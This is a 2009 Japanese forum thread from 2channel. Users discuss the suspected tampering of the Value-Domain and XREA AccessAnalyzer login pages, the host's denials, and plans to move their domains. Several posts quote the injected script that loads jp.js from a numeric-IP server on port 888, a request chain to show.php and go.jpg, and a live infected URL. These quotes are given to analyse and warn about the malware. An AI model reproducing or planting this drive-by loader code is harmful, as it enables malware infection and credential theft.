公式アナウンスしないっていうより、できないのかも
何が起こったのか把握できる技術者が外注にもいないんだよ、きっと

デジロが無視できない状態にしたいのであれば、
国に動いてもらえばよかろう

国に動いてもらいたいなら正式に通報しろよ
誰もやってないんだろ

>>430
＞URL間違ってね？
って、そういう意味か
>>427のソースはこっち
view-source:http://dnf.wikiwiki.jp/
>>428で問題だったインラインフレームタグって
./er/pr.phpだろう？
まったく同じのはなかったけど
それで安全ってことでいいのか？
こっちはiframeどころかHTMLも碌に
知らないんだから分かる人よろしく
直踏みの感想は特に問題なかったけど
当方の環境で問題なしとしか言えない

>>434
誰もやってないだろうね
ここのユーザーは、基本的に法の知識も低い傾向があるしな

>>436
お前とかな

お子様が紛れ込んでいるようです。

法の知識が低いとなんかまずいのかね？
頭でっかちの知識自慢は嫌われますよ〜

>>436
ググレカスの人ですか？

んで今はどんな状況よ

FTP侵入
↓
サイト改竄
↓
ウイルス埋め込み

だけならいいが、
FTPに入られてDBに接続するプログラムを見て、
DBの顧客情報をもってかれていたら終了だろ

関係あるかな？

韓国で大規模サイバー攻撃、大統領府など被害
ttp://www.nikkei.co.jp/news/main/20090708AT2M0800Z08072009.html

アナウンスないと、突っ込んだ話は正直わからないよねぇ

>>440
>>141で規約に謳ってあると言われて
いなくなっちゃったよ
ソース>>142

規約の「責任の限界」の内容って、「無責任」とどう違うのかだれか教えて

>>445
責任と取るべく努力はするが、ダメだったら許してね
ってことだが、実態は無責任に近いなｗ

さすがにサーバー落ちたとかそういうレベルじゃなく、資産が他人に盗まれる
可能性を含んだ問題だからなぁ、fc2かgodaddyにでも移動するか・・・

ネームサーバ障害の徹底放置しかり、この状況下で移管は止めんが移管先の話は
該当スレでどうぞ。

デジロ社員といつもの頭おかしい子の「他社工作員乙」ってワードの呼び水になるん
でそういう話は該当スレで頼む。

レンタルアクセス解析サービス　謎のあやしい文字　＆　う　・・・
いまは、でない。気のせいだったのか・・・　気のせいだったんだろうなぁ
でも、どこででたんだろう・・・　いまいち記憶が・・・

今のとこ実害報告ないけど、実際に実害報告出だしたらどう命名されるんだろ

DigiRoウイルス

かなぁ？

大阪ウィルスだろｗｗ

移管しようにも怖くてログインすらできんのだが…
ある程度の安全が確保されてから全移管する

>>451
全部一気に移管するならログインしても問題ないだろ
終わってしまえばもう関係ないんだからさ

俺も怖くてログインできないクチなんだよな…
入金したから、その申請をしたかったんだが…

正式なアナウンスしないつもりなのかな？

ある程度まとまった数のユーザーに実際の被害が出なけりゃこのまま黙殺だろ

被害が出たらそりゃ凄い事になりそうだけどなｗ

ソースは２ちゃんとか走りすぎじゃない？
何処も自身で確認した訳でもなく、そーすは２ちゃんって言ってるじゃん
しかも個人ブログとかどう信用しろっていうんだ

>>451
俺ログインしまくってるけど特になにもないよ

何か言う前に同一スレ内くらいざっと読めよ

仮に改竄時にパスを抜かれてたとしてだ、
現時点でコード削除されていて、再発していないということは、デジロ側で抜かれたパス変更してるはず。
なんで待ってないでさっさとログインしてパス変えちゃえば心配ないと考える。
むしろ何かされるの待ってる方がマゾ。

>>456
スレ全部読んだけど、上でも誰かいってたけど原爆ネタと同じ流れじゃん
魚拓も含めて。

前にxreaで運営しているネトゲサイトだかなんだかにスクリプト埋め込まれたのも同じ方法じゃないか？

あんときは　ｈｔｔｐ:／／１０３９０４５７４４：８８／ｊｐ.ｊｓ　だったけど

xreaはこんときスクリプトの脆弱性をついたXSSって発表してるから今回もそうかね？
だとしたら間抜け以外の何モンでもないな

ttp://sb.xrea.com/showthread.php?p=84465

ミスリードにも程がある

コンタクトフォームで聞いたが、

--------------------------------------------------------------------
お世話になっております。

お問い合わせについてですが、先ほど問題無くログイン可能でございました。

セキュリティソフトなどの警告も無く、現状ではユーザー様から連絡いただいた症状を確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。
---------------------------------------------------------------------

「現状ではユーザー様から連絡いただいた症状を確認できませんでした。」
と言う言葉を信じるなら、ガゼじゃないのか？
妬みを持つユーザーから

godaddyは以前クラックされてたよな。
FC2は安いしVDに近い操作ができそうだが、実際どうなのかな

こんな時に何だけど、ネームサーバ障害はやっぱり完全放置なんだよね？

サポートに質問してみたら速攻レスきて驚いた・・・

[2009-07-08 14:51:02] サポートからメッセージが追加されました。

お世話になっております。

お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。

２ちゃんを信じるか公式のコメントを信じる最終的には個々の判断だけど
もし事実じゃないとしたら、いくら２ちゃんねるだからといって悪質にも程があると思う。
ミスリードに釣られて煽った人間も同罪。

魚拓はどうなの
怖くてみれない

>>465
スレの内容どおりだよ、マルウェアが仕込まれたjsファイルへのリンクが埋め込まれてる
ブラウザのjavascriptを切った状態でアクセスしてソースを確認すればいい

やはり、改竄はなかった。サポートが正式回答しているではないか。
他社工作員乙。捏造するにも程がある。いい加減にしろ。

firefox+Noscriptで魚拓見てきたけど
たしかにあったねs.jsっていうの
この魚拓URL見せたらなんて言うんだろう？

ソースのログインフォームの下あたりだよね

魚拓が捏造でしょ
デジロが正式アナウンスしない限り、他社工作員の捏造

改ざんされて被害にあったっていってたひとがふしあなで書き込むといいんじゃない？

捏造って流れで押そう！ ってのがトレンドなんだｗ

ホメ殺しでしょ、極端なデジロ擁護で逆に反感を煽ってるんだよ

ははｗｗ
前スレ終盤あたりからだよねその流れｗｗ

極端なデジロ擁護っていうのがよくわからない

魚拓が捏造可能って話にしちゃうとそれはそれですごい面倒な話になる気がする

社員乙っていわれるようにレスしてんじゃないの
原爆の時みんなにスルーされてたやつじゃない？

魚拓がねつ造可能だと通報しろ。そっちの方が世間的には盛り上がるぞｗ

>>462
FC2は複数のドメイン管理で切り替えが必要な時点でクソ。
個人的にはムームーの方がよっぽど使いやすいレベル。

おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。
で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、
仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、
サポートにその申し送りがされてないとしか考えられない。

とことん「改竄がなかった」ことにしたい輩がいるけれど、
俺から見れば、むしろそうやってうやむやにしたい奴のほうが悪質に見える。

>>473
その可能性はあるね。頭がおかしいとしか言いようがない。

自分で確認できなかった事と事実をなかったことにしろっていうのは違うだろ。
公式がないって言ってんのを名無しを信じろっていうほうが無理だろ

なかったことにしたい人が必死すぎてこわい

俺から見れば名無しで書き込んで、信じろっていうやつのほうが頭おかしいと思うが

>>480
お金を取って、ログまで残して回答してるのと、
2chのどっちを信るかろと言えば、前者だろ。

ちょっと考えれば、value-domainってlocalアドレスを
自分のPCで書き換えれば、URI付き魚拓なんて捏造いくらでもできるからな。

絶対ガセ

>>482
頭大丈夫？

名無しの問題じゃなくて、魚拓の信頼性だろ

どうせわざとやってんだから相手にすんなよ

>>481
そんなこと言うなら、
「公式がないって言ってる」という情報源だって名無しだろうが

急にP付で書き込んでてﾌｲﾀｗ
恥を知れｗ

>>484
それ自分はだませるけど魚拓側のリゾルバはだませないだろ？

ガセを流した方々へ

コンタクトフォームで問い合わせしてるやしまで現れて、
デジロックは無駄な労力使ってる。

そろそろ許してやれよなーー

ActiveX…恐ろしい子っ！

>>490
localhost value-domain.com

でいいんでない？

>>481
まあいいや。
君が善意の第三者と仮定するなら、君の言い分も分からないではない。
ただソースをこの目で確認した俺からすれば、隠蔽工作をしているデジロックに
対して心底腹が立つ。

てか俺、完璧釣られてるのかな。

>>493
魚拓のコンテンツ取得って魚拓のサーバーがやってるんだから
ローカルのホスト情報関係ないと思ったんだけどそういう仕組みじゃないんだっけ？

>>493
魚拓サイトのサーバにそれをどうやって書き込むの？
自分のPCだけだよそれで騙せるのは

魚拓というアーカイバーか。なるほど。

被害にあったっていうならふしあなで書き込めばいいんじゃない？
そうすれば擁護の連中も信じるかもよ？

>おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。
>で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、
>仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、
>サポートにその申し送りがされてないとしか考えられない。

>>494
ええ、釣られてると思いますよ

>>494
ヒント：現在勤務時間中

ID出れば社員がわかって便利なのに不便だな

お待ちかねの社員乙のタイミングですねｗ
わざわざご苦労さま

ガセ情報を流しているのは社員の方ですね

>>499-500
だよねぇ・・・。

>>498
べつにやってもいいけど、何の根拠にもならんだろ。
相手が善意の第三者でないなら尚更のこと。

意味がわからない・・・

いっそまちBBSとか、全員強制IPのところでやれば面白い。

まぁ、そのうちにドメイン乗っ取りが開始されれば、少しはここも静かになるわな。

WEB魚拓の中の人に連絡してみる
どっちかが捏造してるんだろ？それは罪を問われるべき

デジロの捏造だとしたら救いようない問題だし
WEB魚拓経由で捏造してウィルス撒いてるとしても問題
これは白黒つけるべき

ややこしくなるからお前もうでてくんなよ

あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー　ttp://ax.xrea.com/
のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない？

>>511
ある！　同じjsが

うわ！マジで居る
見に行くならスクリプト切っていけよ

>>511

</head>タグのちょうどうえ

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement('script');
js.src ="ｈｔｔｐ://1856317799:888/ｊｐ．ｊｓ";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>
</HEAD>

どうも。アバスト反応して、入る前にすぐ削除したけどびっくりしたわ。>>511
昨日の昼ぐらいまでは、こんなん反応しなかったハズ。

今もうPCの電源落としてアドエスからP2経由でレスしてるんで、
魚拓等必要あれば誰かたのんますー。

デジロ社員はこんなとこで遊んでないで…

とっととデジロウイルスの対策をしろよ

login.phpにあるの？今ソース確認中

IE使ってる人は要注意だなこりゃ

>>518
違う、>>511 をよく読め

この人病気なんかな・・・

value-domainの方は大丈夫だねさすがに

ログイン画面じゃなくてトップページじゃない？

なくなった…

トップページとログイン画面のソース見たけど
>>514に書かれてるやつなかったよ。別のページなのかな

たしかに貼られた直後見に行ったけど無かった
すでに消されてたのか？

まだ残ってるよ
いい加減なこと言うな

>>525
いやもうない

おいｗふざけるのもいい加減にしろｗ
>>511みてすぐ行ったけど確認できなかったぞ！
釣られた俺が恥ずかしいだろうがあああああああああああああああ！ｗｗｗ

自分も見つからなかったが、>>511が書き込まれた直後に対策されたか？
ソースチェッカーオンラインでは16:11にチェックされたキャッシュが残っていて、そこでは不正コードが確認できる
ttp://so.7walker.net/?site=http%3A%2F%2Fax.xrea.com%2Flogin.php&hua=

（魚拓と違っていつまでこの不正コード入りキャッシュが残ってるかは不明

ある。ほぼ同じコードが入っている。jp.js

>>530のソースは確かに確認できた。
けどやはりアクセス解析の方はもう無いみたいだよ。

リアルタイムで改竄されてるの？

たった今消えたな
なんかついたり消えたりしてる？

いやはやなんともｗ
釣りじゃなくて本当にあったんだがもうなくなってるわ、少なくとも俺は確認できない

自分で見なきゃ信じられんのは俺も同じだから罵倒されてもしょうがないけど
やべぇ、ウィルスとかそんな問題より現状が面白くてしょうがないｗ

わろたｗｗｗなんだこいつｗ

問い合わせてから2営業日経とうとしているがその後の回答が全く無い
ガセならガセでいいんだが、「改竄の事実はございません」の公式アナウンスがなぜできない！
技術に自信がないのか？ブランド信用力の低下が怖いのか？（今さら！）

ＶＤとは6年近い付き合いだけど、今さっき全ドメイン移管手続きを執ったよ。。。

今回の件だけはVDのトップページで公式にアナウンスして欲しかった。
改竄の事実が無いなら「無い」と堂々と宣言できないVDには愛想が尽きたよ。

念のため全ページのソース見てきた。
今のとこはコード入ってないようだ。

16:17 の時点に wget で確認したけど、確かに混入してるね。
バランサで混入ありソースとなしソースが流れてるんじゃね？

魚拓のURLをよく見ろスキームはhttpsだ。
これがねつ造であるなら、SSLでなりすましが可能である事を示してる。

>>511
おもいっきり仕込まれてる。ソースで言うと62〜68行目。
64行目に 1856317799:888/jp.js がある。

デジロック関連はしばらくスクリプト切ってアクセスしたほうがいいんじゃねえか

消えた。攻撃者がここ見ててひっこめたとかだと嫌だな。

それだと上げてるやつが一番怪しく思えるぞｗ
まーそんなことはないでしょ

こいつぜってー頭狂ってるｗ

ax.xrea.comは全部のページやられてるなｗ

>>539
うわ、まじだ

>Name: ax.xrea.com
>Addresses: 219.101.229.188, 219.101.229.189
前者に不正コード確認、後者はなし

ttp://219.101.229.188/login.php (現時点で不正コード注意)

この板に社員が常駐して、問題があるたびに直しているとしか思えないな

魚拓がちょうど今メンテナンス中で取れないんだよなぁ

何が起こっているのかだけでも早く知りたいよ
アナウンスしろよVD

>>539が正解じゃないか？

>>539
ax.xrea.comは2台だな。
219.101.229.188 ←やられてる
219.101.229.189 ←やられてない

さっきからコードないないって書き込んでる奴だけど
>>547のURLでなら確認できた。

>>548
それはそれで対応してくれてるなら助かるけどさ
再アップロードしてはい直しました！って話だったらトルチョックかましたくなる

とりあえず、何度か取得してみたけど、あり・なしが落ちてくるね。

ありindex.html：11818 byte で CR+LF
なしindex.html：11310 byte で LF

diff は改行コード以外は 62〜68 行目の SCRIPT だけだね。

>>547
専ブラで飛んじゃうような貼り方するなよ…

魚拓のメンテ終わるのと不正コード除去とどっちがはやいかな

>>555
すまん、以後http全部抜くわ

アクセス解析タグに仕込むことも出来るんじゃと思ったら
ぞっとした

ひょっすると社員も確認する術がなくて、ガセなんじゃ・・・とか思ってるのかもなｗｗ

たぶん、リアルタイムに罠貼ったり外したりしてるｗ
俺は、7月5日の夜中にwikiwiki.jpの方でトロイphp仕込まれてるのみたけど、
5分後には、なくなってたりとか、管理人が削除したにしては、やけに対応が早いなとは思った。

踏んできた。一発でヒット http://www1.axfc.net/uploader/He/so/233661.png dlkey: dxvwvd

バレる前に削除して、定期的にパスを抜いてんだろうな
よくよく考えるとかなり深刻じゃないか？

>>445
「個人情報の取り扱いについて」で
＞ユーザー登録時に申請された情報は一切公開されません。当データベースサーバー内に保存され、厳重に保管されます。
＞自動課金等のオプションをお客様が選択される場合、クレジットカード情報が当サーバーに保存されます。それらの情報は当データベースサーバー内で暗号化・保存され、厳重に保管されます。
とはあるけど、果たして罰せられるのかねえ

「責任の限界について」で>>141に加えて
＞あらゆるユーザーデータの操作処理
もあると思ったけど、不正アクセスは操作処理ではなく通常の管理だから違うのか

＞あらゆる非常事態が発生したことによる損失
今回のことが非常事態といえるのか
＞あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失
あらゆる原因に法的例外とかはないのか

とここまで考えて思ったんだけど。。。

責任の限界もなにも通常業務レベルでセキュリティ対策は必須事項っすよ

でも不正コード削除してもログは残るんじゃないの？
内部の人が書き換えてるじゃなければ、分かりそうなもんだよね？

これやばいだろ…

ここのアクセス解析使ってるとこたくさん見るから
やばいんじゃないかな…さすがに。

>>561
法律家じゃないから根拠法とかわからんけど、消費者保護の観点から消費者に著しく不利な契約は無効とかじゃなかった？
果たすべき管理責任を果たさないことにより利用者が損害を受けた場合は当然賠償責任が発生すると思うけど。

value-domainならまだ利用者数はそれほどでもないだろうけど
xreaとなると話はだいぶ違ってくるね

魚拓が改鼠されているとかいうとんでも理論をデジロックが発表するのに期待・・・
と思ったらxreaにも仕込まれてたか、どうみてもデジロックやられてるだろｗ

アクセス解析のサーバーとバリュドメのサーバーは別だよね。
デジロ関係が軒並み侵入されてるってこと？

>>563
同意。

いつ改竄されたのかヘッダ見ようと思ったらこれ動的に生成してるのね。
>>554 index.htmlは存在しない。index.php。
このサーバのPHPの出力に全部くっついてくる気がする。

>>570
あぁ、すまん。そういやそうだね。

こうなると次はXREAかCOREのadmin.cgiにも仕組まれるのかな

jsの中身見たら不正コードに混じって忍者TOOLS提供の
アクセスカウンタのコードが入っていて憎たらしいと思った

いつものコピペの事務員レベルじゃ状況把握出来てないっぽいな。終わってる。
すべてのphpスクリプトの安全宣言出るまで使えないでしょ。

規約の法的拘束力って限界あるよね

電子商取引等に関する準則
?目次? 第１．オンライン取引_
5(3) なりすましを生じた場合の認証機関の責任
http://74.125.155.132/search?q=cache:_khHgPhY4rcJ:www.meti.go.jp/topic/downloadfiles/e2032

>セキュリティベンダーなどの公開情報によれば、この脆弱性を悪用した攻撃コードは既に広範囲に仕掛けられた形跡があり、日本のサイトも含まれるという。
http://internet.watch.impress.co.jp/docs/special/20090708_300654.html

今回の事と関係なし？

こんなに自在に書き換えできるんなら、よっぽど管理者を馬鹿にしてないかぎり、足跡消すはず

で、公式発表は、改ざんはないんだっけ？　どうなの、これ

XREAとかにFTPのログインしても大丈夫なんだろうか

忍者のアクセスカウンタだと…？

>>575
いやそのものずばりだよ。

お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。

今回のはjpgに仕組まれてるのが怖いな

gifとswfにも入ってるよ

VALUE DOMAIN サービス利用規約には
準拠法、管轄裁判について
当規約には日本法が適用されます。また、当規約、当サービスに関わる一切の紛争は、大阪地方裁判所の専属管轄とします。
とある
大阪地裁だから
Yahoo! BB顧客情報漏洩事件
http://ja.wikipedia.org/wiki/Yahoo!_BB%E9%A1%A7%E5%AE%A2%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9%E4%BA%8B%E4%BB%B6

>>579
サンクス そのものずばりですか・・・

>>578
いじり中ですかｗ
pdfとswfとmsvidctlスクリプト、および降ってくるexeについては
ベンダーにも送ってあるしセキュ板にもアップしてあります。

降ってくるexe、一応カスペルスキーだと処理してくれるね
他は知らんけど

>>575
先月からIEから火狐に乗り換えておいてよかった…本当によかった…

>>265で報告したのに

改ざんがないってことは、自分でやってんじゃね？

社員のいたずらだったりしてｗ

２ちゃんねるの情報なんて参考にならない
すべて捏造で壮大な釣りかもしれない

>>591
2chでも嘘を書けば逮捕されるのでそれはない

ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。

魚拓って改ざんされないの？

ttp://www.avertlabs.com/research/blog/index.php/2009/07/07/an-artemis-view-of-0-day-attack/
大阪辺りの赤丸は…

このスレは以下の五大勢力で構成されています

混乱させようと、改竄はないと嘘を言ってるヤツ：1人(>>580とかそのへん)
改竄を目の当たりにしたヤツ：数人
怖くて確認できないけど心配してるヤツ：多数
リアルタイムで弄ぶ改竄クラッカー：1人
デジロ工作員：数人

>>596
お前はどれ？

降ってくるexeって何？

俺はガンダムだ

改竄を目の当たりにしたヤツじゃないと信じられない流れだろ

>>597
俺はlogin.phpの改竄を目の当たりにした人間

アクアナは現時点で確認できるでしょ？>>600

>>602
いや俺は一番浮かれてたバカだよ、書き込み後に真っ先に見た

5月末からのネームサーバ大障害の放置も捏造でプッシュするのかな？

jsをオフにして、アクロバットリーダーとフラッシュプレイヤーを最新にして、
fix itとか言う奴をやっとけば大丈夫？

>>598
exeがPCにいつのまにかDLされてくる
何も表示ないし、隠しフォルダにはいってくるからレジストリみてないとわからんかもしれんけど
普通はセキュリティソフトが防ぐから、ノーセキュリティのときのみだが

VDもアレだが、そもそもVD狙って改竄してる奴は誰なんだ？

>>606
ありがとう。

昨日アクアナにカスペが反応したときはビビッた。

こうなってくると去年の改竄さわぎもデジロの説明じゃ納得できんな
スクリプトの脆弱性なのか、それともサーバの脆弱性なのか
サーバの脆弱性だったらレンサバの方も危ない

exeはキーロガーっぽいけど
ログインパスだけじゃないよな。どこまで狙ってるんだろ

結局1年経っても何の対応もしてないよな。

アクアナ関連はxrea絡みだからxreaスレでやれば？
2スレが噴いた方が捏造煽りの子も喜ぶんじゃね？

アクアナは専用スレがあったはず

>>613
【アクセス解析】AccessAnalyzer.com Part5【XREA】
http://pc11.2ch.net/test/read.cgi/hp/1234096306/

本来はサポートフォーラムでやった方がいいんだけどね

login.php のソース読んだ限りぜんぜん問題なさそうだが?
js自体ほとんど使ってないし
なにが問題なんだ?

ブラウザからダウンロードするのって、かならずダウンロード前にウィンドウが出たり、上のバーがでるもんだと思ってた
セキュリティホールつくと本当になにも表示されないんだな、気がついたらDLされてて驚いた
勉強になったわ

あんまり情報が分散すると、見るのがたいへんというのもあるんだよね。

ソースを読めても日本語読めないのかよ

実質的にここがデジロック総合スレだと思ってたわ

>>614
2分でスレ拾ってくるとは仕事が速いねｗ

いや、前から知ってるけどそれ製作板だよね？
xrea系列のサービスなんだからxreaスレでやりゃいいじゃん。
その方がいつもの捏造煽りの子も同板内で2ヶ所同時にスレ噴いて楽しめるから良いかなと。

>>617
降ってくるexe？
どこにダウンロードされるの？
ファイル名教えて。

問題のところｒ開いて、ソース見たけど、中身が何もない
でもexeはDLされて、カスペルスキーが反応する。これどういう技術？　怖いんだけど

IE使ってないけどなんかこわいからFix itしてきた

>>621
その趣旨なら、複数の板で騒いだ方がいいんじゃね？
でも、オレは分散するとめんどくさい派

カスペルスキーとアバストの報告はあるし、ノートンは対応してるらしいよね、告知では。

ウイルスバスターはどう？

>>625
だな。
先に行って待ってりゃデジロ社員共々やって来るだろうからそうするわ。

>>607
保守管理しているシナ人じゃねぇの、前回と同じ集団

js切ってると不便だね。
自分が、jsオフでも別の手段でフォローするようなサイト作りをしてるから、
それが無いサイトを見ると、なんかムカつく。

ブラウザで表示されているリンクをクリック、または立ち上げるだけで
それ以上の操作を必要することなく、
ユーザはふと気付くと、シームレスに自動でソフトがインストールされ使用できる状態になっている

そう考えると、無駄な操作がはぶけてストレスのたまらない便利な技術だよね、これ

gigazineに垂れ込もうかと思ったら、
jsオフだとメールフォームが表示されない。

そこはONにしてもいいだろ

ax.xrea.com
http://wepawet.cs.ucsb.edu/view.php?hash=58ad9f9f57a66bdddf69e86e9701cbc6&t=1247041861&type=js

ax.xrea.com/login.php
http://wepawet.cs.ucsb.edu/view.php?hash=9fab8d84e3289b2a7c5f9cdbd4043c09&t=1247041318&type=js

>>605
なるべくならIE以外を使用する

>>633
これ踏むとどうなるの？

VDの公式告知ﾏﾀﾞｰ

>>607
狙ってるわけじゃなくてきっと無差別攻撃の結果陥落しただけ

このスレだけレンタル鯖板で異常なほど速い……速すぎだろ
異常事態だから当然かもしれんが

落書きはすぐに消さないと、ルーズな住民が多い場所だと認知されて、
どんどん落書きが増え、治安も悪くなるって話があるけど、それと同じじゃね？

カウンターや広告の不具合がずっと続いてるし、サポートBBSもろくな対応をしない。
そういう状況だと狙われやすいんじゃないのかな？

そーいやカウンターは使ってないけど、あれは大丈夫なのか？

>>637
いや、DNS攻撃の頃からターゲットはしてたと思うよ

とりあえず、俺らに出来ることは、出来るだけこの件を多くの人に広めることだ。
俺はgoogleアドセンスのスレにこの件を書いてきた。
お前らもVD使ってそうな人がいるスレには何か書き込んだほうがいいかも。

maliciousとかどんだけー

これでうっかりVDが消滅されても困るんだけどなｗ

>>461がガセネタであればいいのだが。

出たり消えたりしてるみたいだからサポートが確認出来てないのかもしれんが
それだと根本的に何の対策もしてないって事だよな

問題を認識してるのにしらばっくれてるのと、
問題を認識できていないのと、
どっちが怖い？

記事は今のところ検索かけてもこのくらいしか引っかからないな

http://www.mudaijp.com/wp/5596.html
http://ilion.blog47.fc2.com/blog-entry-140.html
http://miracosta-s59nov21.cocolog-nifty.com/weblog/2009/07/post-7477.html

ここまで騒ぎになってる割に「ドメインを乗っ取られた」系の被害（報告）が無いのが不思議。

219.101.229.188/login.php

↑の</HEAD>直前のjs.src ="http://1856317799:888/jp.js";ってのがウイルス？

派手にのっとることが目的じゃなくマルウェア配布が目的なので
こっそりとやってるのです

せめて危険なURLは全角で書いてくれ
クリックするだけでウイルス感染するかもしれんだろ

ごめんリンクになってる削除依頼出すから踏まないでね

>>650
おいおい何してんだお前

ちょっと出掛けてた間にまたえらい騒ぎになってるな。
で騒ぎが一段落したら、またさっきみたいに改竄は捏造だとか
名無しソースは当てにならんとか言う奴出てくるのかな。

おいおい、なんか、どんどん被害大きくなるな。
大丈夫か？この会社は。

実被害が出ない限り騒ぎそのものはこのまま収束する可能性が高い
その後で騒ぐ奴は粘着としてスルーされるだろうし

まぁ無関係の俺は公式リリースをwktkして待つぜｗ

ギャーまじですか
今頃気づいたorz

>>649
2週間ほど前によくわからん理由でVDアカウント凍結された＞＜
だれかにアカウント乗っ取られた可能性がある
サポートに連絡した後、担当部署の対応待ちだったんだが
まったく音沙汰なくてしびれを切らしてたところ

>>658
「よくわからん理由」plz

>>659
自分では購入した覚えのないドメインを指摘され、それが利用規約に違反してるといわれた
管理画面にそもそも入れないから確認しようがないんだけど

2週間前ってこのスクリプト組み込まれてたの？

その疑問はあるね・・・
違うパターンで乗っ取られた可能性も考えられるから、まだ何ともいえない

本人がよくわからんならデジロに対して証明はできんな
この会社は「可能性がある」だけじゃ絶対自分の非とは認めないだろ

これか。

＞639 ：名無しさん＠お腹いっぱい。 ：2009/06/24(水) 08:25:45 0
＞Value-domainとxreaは最低、
＞勝手にアカウントを取り消された。
＞10個前後のドメインと借りたサーバはパー。
＞メールしても返事なし。

10ドメインと鯖は痛いな。

もしかしたらかなり前からクラッカーに狙われていて
裏で目立たないようにいろいろ動いていたのかも。
ウィルスも常に表示するよりたまに表示するほうが
気づかれにくくて対策されないし。

こえー

アンカーすらまともにつけられない阿呆もいるし

10個前後と言ってる時点で怪しいと思うんだけど。へん？

>>664
それ別の人。
ドメイン持ってるの２つだが、長年使ってただけに失うのは痛いわ
あああなんとかして移管手続きとれないものか

Windows Vista または Windows Server 2008 を使用しているお客様については、
Internet Explorer でこのコントロールにデータを渡す機能が制限されているため、
この脆弱性の影響を受けません。


だってよ
XP＼(＾o＾)／ オワタ

http://pc11.2ch.net/test/read.cgi/sec/1227543474/

>>669
Win7にするといいおｗｗ
でも、今回の乗っ取りはOSは問題じゃないぜ
事件はデジロ内部で起こっている

あのすいません
こんな時に何ですがVDネム鯖が6月のはじめからずっと脂肪してる件については…

どこに移転するかが問題だなぁ・・・
どこかおすすめありませんか？

ドメイン管理しか使ってないけど。

レジストラは鉄板があんまないよなあ

そういう話は専スレでやれ

value-domain 御中

口コミのパワーをなめんなよ

隠蔽したら口コミで広がるからね

>>668
てことは、
ひょっとすると同時期に同じような被害を受けてる人が複数いるって事になるかも。
何が起きているのか考えると、ちょっと恐ろしいね。

報告はないけど、カウンターは改竄されてはいない？
カウンターってあまりログインしないからわからんのかな。

>>660
> 自分では購入した覚えのないドメインを指摘され
自分で購入した覚えがないなら、なんてドメインか晒せるだろ？
ドメイン名出してみ。

>>678
カウンターはウイルス関係なく先々月からのネームサーバ障害でずっと死んでるだろ？

>>660
そのドメイン名を具体的に教えてほしい.

身に覚えがないなら, 個人の特定は無理だと思うから.

いったい何に使われているドメインなのか興味がある.

>>572
忍者ツールズにも通報する！

>>635
HTMLソースを解析して表示するだけだから安全です。

http://1856317799:888 このアドレスをnslookupするとhome.ne.jp内のIPじゃね？







今回の一件でVDには個人的にに失望した。
お前ら、どこに移管する？

移管は止めんが移管先に関する話題は専スレで

>>660
もうちょっと詳しく！！

>>682
リンク貼るなよ

URLStatusContent Type
 tp://ax.xrea.com/login.php  200  text/html 
 tp://1856317799:888/jp.js  200  text/javascript 
 about:blank  200  text/html 
 tp://0x6EA52967:888/dir2/show.php  200  text/html 
 tp://0x6EA52967:888/dir2/go.jpg  200  text/javascript 
 tp://1856317799:888/counter.htm  200  text/html 
 p://ct2.shinobi.jp/sc/1298877  200  text/javascript 
 p://ct2.shinobi.jp/sd/1298877  200  text/javascript 

なにこれ・・・・

To: 682
Norton Safe Web
ttp://safeweb.norton.com/report/show?name=110.165.41.103

Webサイトの場所 香港

だから全角でと何度も…

inetnum: 110.165.32.0 - 110.165.63.255
netname: FKT-HK
descr: Flat/Rm D Block 1, 8/F
country: HK
role: FEIKE TECH LIMITED - network administrator
address: FLAT/RM D BLK1 8/F 162-170 TAI LIN PAI RD KWAI CHUNG NT HK
country: HK
phone: +852 82050331
e-mail: [email protected]
admin-c: FTLn1-AP
tech-c: FTLn1-AP
nic-hdl: FTLn1-AP
mnt-by: MAINT-FKT-HK
changed: [email protected] 20090408
source: APNIC
changed: [email protected] 20090408

>>683　専スレを示せよ

「ttp://〜」にしても、専用ブラウザだとリンクするし、
全角にするのが一番無難ですね。

>>690
もうそのパターンはしつこいって。
一応レスしとくから勝手に探して勝手にやってね。

>>690
>>683じゃないけど
もの凄い勢いで誰かが有料ﾚﾝﾀﾙｻｰﾊﾞｰを探すスレ 13
http://pc11.2ch.net/test/read.cgi/hosting/1229551534/
あたりじゃね？

とりあえずはVDをヲチするしかないの？
誰かお茶持ってきてｰ

さくらはどうでしょう
他社で取得した独自ドメインを利用する
http://support.sakura.ad.jp/support/manual/rs/setdom_c.shtml

乗り換え先の話題はこっちで

お前らお勧めのレジストラ教えてください
http://pc11.2ch.net/test/read.cgi/hosting/1010742997/

>>694
∧＿∧
( ´･ω･) みなさん、お茶が入りましたよ・・・・。
( つ旦O
と＿)＿) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦

Keysysドメインを2個所有している自分には隙が無かった…

>>698　何の隙?

>>690
まず次のところを見る：
http://www.domainname.ne.jp/

リンククラブは除外するのが無難：
http://www24.atwiki.jp/linkclub/

あとは696の紹介されたスレッドで聞くのが適当だと思う：

お前らお勧めのレジストラ教えてください
http://pc11.2ch.net/test/read.cgi/hosting/1010742997/l50

お茶あちーよ！
麦茶にしてくれ！

そうそう、msvidctl.dllの脆弱性は確かにActiveXコントロールだからIEだけだけど
同時にFlashPlayerとAdobeReader(Acrobat)の脆弱性も使います。
この2つは最新バージョンにしていなければNetscapeプラグイン系
(Firefox、Opera、Safari、etc.)もやられるのであしからず。

>>648
ttp://lineage.paix.jp/guide/security/virus-site.html
